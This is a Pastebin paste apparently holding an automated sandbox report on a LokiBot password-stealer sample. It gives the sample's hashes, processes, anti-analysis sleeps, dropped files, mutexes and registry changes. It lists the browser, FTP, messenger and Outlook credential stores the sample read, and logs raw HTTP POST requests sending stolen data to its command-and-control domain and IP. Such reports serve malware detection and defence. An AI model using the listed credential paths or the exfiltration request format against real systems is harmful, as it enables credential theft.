Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Lokibot"
- * MalScore: 10.0
- * File Name: "lokibot_6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042"
- * File Size: 106496
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042"
- * MD5: "7828d6afbad04cad71b74dd202d9efb3"
- * SHA1: "e43c70e3493173174155df5452b6d16381fb8b1a"
- * SHA512: "5a5b9c9f8406eb8c98f53b10a7f03018d11c088a9bdf292c74aea1953f237331a9df9a4159b4b1e1be3c1619e3b7c7dc075570f828841a0d6506cd78b314c93b"
- * CRC32: "691D5E0C"
- * SSDEEP: "1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqfIzmd:nSHIG6mQwGmfOQd8YhY0/EqUG"
- * Process Execution:
- "lokibot_6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042.exe",
- "services.exe",
- "WmiApSrv.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "WmiPrvSE.exe"
- * Executed Commands:
- "C:\\Windows\\system32\\lsass.exe",
- "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
- "C:\\Windows\\system32\\svchost.exe -k netsvcs",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
- * Signatures Detected:
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "svchost.exe tried to sleep 480 seconds, actually delayed analysis time by 0 seconds"
- "Process": "lokibot_6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042.exe tried to sleep 1500 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 600 seconds, actually delayed analysis time by 0 seconds"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "http_version_old": "HTTP traffic uses version 1.0"
- "suspicious_request": "http://myneho.com/.group/one/two/three/four/five/fre.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://myneho.com/.group/one/two/three/four/five/fre.php"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 4992208 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
- "Description": "File has been identified by 60 Antiviruses on VirusTotal as malicious",
- "Details":
- "Bkav": "W32.TasumisCAK.Trojan"
- "MicroWorld-eScan": "Trojan.PWS.ZKD"
- "FireEye": "Generic.mg.7828d6afbad04cad"
- "CAT-QuickHeal": "Trojan.Mauvaise.SL1"
- "ALYac": "Trojan.PWS.ZKD"
- "Malwarebytes": "Spyware.LokiBot"
- "Zillya": "Trojan.naKocTb.Win32.12"
- "SUPERAntiSpyware": "Trojan.Agent/Gen-PasswordStealer"
- "K7AntiVirus": "Password-Stealer ( 004d88671 )"
- "K7GW": "Password-Stealer ( 004d88671 )"
- "Cybereason": "malicious.fbad04"
- "Arcabit": "Trojan.PWS.ZKD"
- "Invincea": "heuristic"
- "F-Prot": "W32/Trojan2.PBTA"
- "Symantec": "SMG.Heur!gen"
- "APEX": "Malicious"
- "Avast": "Win32:LokiBot-A Trj"
- "ClamAV": "Win.Trojan.naKocTb-6331389-1"
- "Kaspersky": "Trojan.Win32.Agentb.bvrg"
- "BitDefender": "Trojan.PWS.ZKD"
- "NANO-Antivirus": "Trojan.Win32.Stealer.eshrhl"
- "Paloalto": "generic.ml"
- "AegisLab": "Trojan.Win32.naKocTb.tnB5"
- "Ad-Aware": "Trojan.PWS.ZKD"
- "Sophos": "Troj/Fareit-CHG"
- "Comodo": "TrojWare.Win32.Fareit.LB@7pzcfo"
- "F-Secure": "Trojan.TR/Crypt.XPACK.Gen"
- "DrWeb": "Trojan.PWS.Stealer.23680"
- "TrendMicro": "TSPY_LOKI.SMA"
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.ch"
- "Trapmine": "malicious.high.ml.score"
- "Emsisoft": "Trojan-PSW.Fareit (A)"
- "SentinelOne": "DFI - Suspicious PE"
- "Cyren": "W32/Trojan.LAPN-1109"
- "Jiangmin": "Trojan.naKocTb.l"
- "Webroot": "W32.Trojan.Gen"
- "Avira": "TR/Crypt.XPACK.Gen"
- "Antiy-AVL": "Trojan/Win32.SGeneric"
- "Microsoft": "PWS:Win32/Primarypass.A"
- "Endgame": "malicious (high confidence)"
- "ViRobot": "Trojan.Win32.Agent.106496.HD"
- "ZoneAlarm": "Trojan.Win32.Agentb.bvrg"
- "GData": "Trojan.PWS.ZKD"
- "TACHYON": "Trojan/W32.naKocTb.106496"
- "AhnLab-V3": "Trojan/Win32.naKocTb.R270234"
- "Acronis": "suspicious"
- "McAfee": "GenericRXCL-KZ!7828D6AFBAD0"
- "MAX": "malware (ai score=85)"
- "VBA32": "BScope.Trojan.Agentb"
- "Cylance": "Unsafe"
- "Zoner": "Trojan.Win32.77501"
- "ESET-NOD32": "Win32/PSW.Fareit.L"
- "TrendMicro-HouseCall": "TSPY_LOKI.SMA"
- "Rising": "Trojan.Fareit!1.B343 (CLASSIC)"
- "Ikarus": "Trojan-Spy.Primarypass"
- "Fortinet": "W32/Generic.AP.BA928!tr"
- "AVG": "Win32:LokiBot-A Trj"
- "Panda": "Trj/GdSda.A"
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- "Qihoo-360": "HEUR/QVM20.1.57ED.Malware.Gen"
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "target": "clamav:Win.Trojan.naKocTb-6331389-1, sha256:6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
- "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
- "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
- "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
- "signature": "ET TROJAN LokiBot Checkin"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
- * Started Service:
- "VaultSvc",
- "wmiApSrv"
- * Mutexes:
- "6EFA73A4746045B65DEE781E",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Flag",
- "Global\\WmiApSrv"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
- "\\??\\WMIDataDevice",
- "\\??\\PIPE\\samr",
- "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
- "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
- "C:\\Users\\user\\AppData\\Local\\Temp\\lokibot_6e513895adf04cd6b1a727bd1312f5faf4fec082b832bebedcd359fc8793b042.exe"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-00000000-0000-0000-0000-000000000000",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dllMofResourceName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.muiMofResourceName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sysACPIMOFResource",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.muiACPIMOFResource",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sysMofResourceName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.muiMofResourceName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sysMofResource",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.muiMofResource",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sysHDAudioMofName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.muiHDAudioMofName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sysPROCESSORWMI",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.muiPROCESSORWMI",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYSPortclsMof",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.muiPortclsMof",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
- * Deleted Registry Keys:
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
- * DNS Communications:
- "type": "A",
- "request": "myneho.com",
- "answers":
- "data": "188.214.30.138",
- "type": "A"
- * Domains:
- "ip": "188.214.30.138",
- "domain": "myneho.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 2,
- "body": "",
- "uri": "http://myneho.com/.group/one/two/three/four/five/fre.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "myneho.com",
- "version": "1.0",
- "path": "/.group/one/two/three/four/five/fre.php",
- "data": "POST /.group/one/two/three/four/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: myneho.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 5D27119C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
- "port": 80
- "count": 26,
- "body": "",
- "uri": "http://myneho.com/.group/one/two/three/four/five/fre.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "myneho.com",
- "version": "1.0",
- "path": "/.group/one/two/three/four/five/fre.php",
- "data": "POST /.group/one/two/three/four/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: myneho.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 5D27119C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement